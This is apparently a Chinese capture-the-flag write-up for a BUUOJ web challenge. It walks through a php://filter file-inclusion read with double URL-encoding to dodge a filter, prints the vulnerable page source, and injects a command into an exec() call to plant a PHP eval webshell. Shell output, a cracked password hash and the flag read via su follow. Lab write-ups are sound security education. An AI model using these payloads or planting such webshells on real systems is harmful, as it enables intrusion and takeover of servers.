知识点:php伪协议
webshell利用
url编码绕过
Linux命令执行
一眼文件包含,先用php伪协议去读取一下GWHT的内容.
http://3e60668c-22a1-46d8-8427-54bb94c616c5.node5.buuoj.cn:81/?file=php://filter/convert.base64-encode/resource=GWHT.php
看来是有过滤,那么用两次url编码就可以绕过了.
Python_url编码脚本:
url = input("Enter a url: ")
encoded_url = ""
for i in url:
encoded_url += '%' + hex(ord(i))[2:].zfill(2)
print(encoded_url)
payload:
http://3e60668c-22a1-46d8-8427-54bb94c616c5.node5.buuoj.cn:81/?file=php://filter/%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%35%25%36%65%25%36%33%25%36%66%25%36%34%25%36%35/resource=GWHT.php
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQoNCjxoZWFkPg0KICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJpZT1lZGdlIj4NCiAgICA8dGl0bGU+Y291bnQgaXMgaGVyZTwvdGl0bGU+DQoNCiAgICA8c3R5bGU+DQoNCiAgICAgICAgaHRtbCwNCiAgICAgICAgYm9keSB7DQogICAgICAgICAgICBvdmVyZmxvdzogbm9uZTsNCiAgICAgICAgICAgIG1heC1oZWlnaHQ6IDEwMHZoOw0KICAgICAgICB9DQoNCiAgICA8L3N0eWxlPg0KPC9oZWFkPg0KDQo8Ym9keSBzdHlsZT0iaGVpZ2h0OiAxMDB2aDsgdGV4dC1hbGlnbjogY2VudGVyOyBiYWNrZ3JvdW5kLWNvbG9yOiBncmVlbjsgY29sb3I6IGJsdWU7IGRpc3BsYXk6IGZsZXg7IGZsZXgtZGlyZWN0aW9uOiBjb2x1bW47IGp1c3RpZnktY29udGVudDogY2VudGVyOyI+DQoNCjxjZW50ZXI+PGltZyBzcmM9InF1ZXN0aW9uLmpwZyIgaGVpZ2h0PSIyMDAiIHdpZHRoPSIyMDAiIC8+IDwvY2VudGVyPg0KDQogICAgPD9waHANCiAgICBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCA1KTsNCg0KICAgIGlmICgkX0NPT0tJRVsncGFzcyddICE9PSBnZXRlbnYoJ1BBU1MnKSkgew0KICAgICAgICBzZXRjb29raWUoJ3Bhc3MnLCAnUEFTUycpOw0KICAgICAgICBkaWUoJzxoMj4nLic8aGFja2VyPicuJzxoMj4nLic8YnI+Jy4nPGgxPicuJzQwNCcuJzxoMT4nLic8YnI+Jy4nU29ycnksIG9ubHkgcGVvcGxlIGZyb20gR1dIVCBhcmUgYWxsb3dlZCB0byBhY2Nlc3MgdGhpcyB3ZWJzaXRlLicuJzIzMzMzJyk7DQogICAgfQ0KICAgID8+DQoNCiAgICA8aDE+QSBDb3VudGVyIGlzIGhlcmUsIGJ1dCBpdCBoYXMgc29tZXRpbmcgd3Jvbmc8L2gxPg0KDQogICAgPGZvcm0+DQogICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIHZhbHVlPSJHV0hULnBocCIgbmFtZT0iZmlsZSI+DQogICAgICAgIDx0ZXh0YXJlYSBzdHlsZT0iYm9yZGVyLXJhZGl1czogMXJlbTsiIHR5cGU9InRleHQiIG5hbWU9ImNvdW50IiByb3dzPTEwIGNvbHM9NTA+PC90ZXh0YXJlYT48YnIgLz4NCiAgICAgICAgPGlucHV0IHR5cGU9InN1Ym1pdCI+DQogICAgPC9mb3JtPg0KDQogICAgPD9waHANCiAgICBpZiAoaXNzZXQoJF9HRVRbImNvdW50Il0pKSB7DQogICAgICAgICRjb3VudCA9ICRfR0VUWyJjb3VudCJdOw0KICAgICAgICBpZihwcmVnX21hdGNoKCcvO3xiYXNlNjR8cm90MTN8YmFzZTMyfGJhc2UxNnw8XD9waHB8Iy9pJywgJGNvdW50KSl7DQogICAgICAgIAlkaWUoJ2hhY2tlciEnKTsNCiAgICAgICAgfQ0KICAgICAgICBlY2hvICI8aDI+VGhlIENvdW50IGlzOiAiIC4gZXhlYygncHJpbnRmIFwnJyAuICRjb3VudCAuICdcJyB8IHdjIC1jJykgLiAiPC9oMj4iOw0KICAgIH0NCiAgICA/Pg0KDQo8L2JvZHk+DQoNCjwvaHRtbD4=
进行base64解码:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>count is here</title>
<style>
html,
body {
overflow: none;
max-height: 100vh;
}
</style>
</head>
<body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;">
<center><img src="question.jpg" height="200" width="200" /> </center>
<?php
ini_set('max_execution_time', 5);
if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>
<h1>A Counter is here, but it has someting wrong</h1>
<form>
<input type="hidden" value="GWHT.php" name="file">
<textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50></textarea><br />
<input type="submit">
</form>
<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>
</body>
</html>
一共有两处代码 :
<?php
ini_set('max_execution_time', 5);
if ($_COOKIE['pass'] !== getenv('PASS')) {
setcookie('pass', 'PASS');
die('<h2>'.'<hacker>'.'<h2>'.'<br>'.'<h1>'.'404'.'<h1>'.'<br>'.'Sorry, only people from GWHT are allowed to access this website.'.'23333');
}
?>
这个代码就是让你的cookie里的pass要等于GWHT.
第二处代码:
<?php
if (isset($_GET["count"])) {
$count = $_GET["count"];
if(preg_match('/;|base64|rot13|base32|base16|<\?php|#/i', $count)){
die('hacker!');
}
echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c') . "</h2>";
}
?>
这里呢是要我们绕过一个正则匹配,同时要通过下面的exec函数去获取flag值.
那么开始解题吧.
将这里的pass值改为GWHT.
开始第二关:
我们可以通过写shell木马的方式去控制他的电脑.
由于呢正则表达式过滤了php,所以我们可以用<?=?>来代替.
同时开始构造payload
/?file=GWHT.php&count='|echo%20"<?=%20eval(\$_POST['cmd'])?>"%20|tee%20b.php|'
那么反应到服务器的效果呢就是
exec('printf \'' . '|echo "<?= eval(\$_POST['cmd'])?>" |tee b.php|' . '\' | wc -c')
之后链接蚁剑.
(www-data:/var/www/html) $ ls /
GWHT
bin
boot
dev
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
(www-data:/var/www/html) $ find /GWHT -name *flag*
/GWHT/system/of/a/down/flag.txt
(www-data:/var/www/html) $ cat /GWHT/system/of/a/down/flag.txt
cat: /GWHT/system/of/a/down/flag.txt: Permission denied
(www-data:/var/www/html) $ ls -l /GWHT/system/of/a/down/flag.txt
-r--r----- 1 root GWHT 43 Sep 6 12:05 /GWHT/system/of/a/down/flag.txt
可以看出来没有权限.
(www-data:/var/www/html) $ ls /GWHT
README
avenged
dream
findaas
led
system
(www-data:/var/www/html) $ cat /GWHT/README
My password hash is 877862561ba0162ce610dd8bf90868ad414f0ec6.
这里有一个README文件那就读一下发现是GWHT账户加密过的密码.
去解码一下.
解出来是GWHTCTF
于是我们开始读取flag.txt
echo "GWHTCTF"| su - GWHT -c 'cat /GWHT/system/of/a/down/flag.txt'
游戏解释.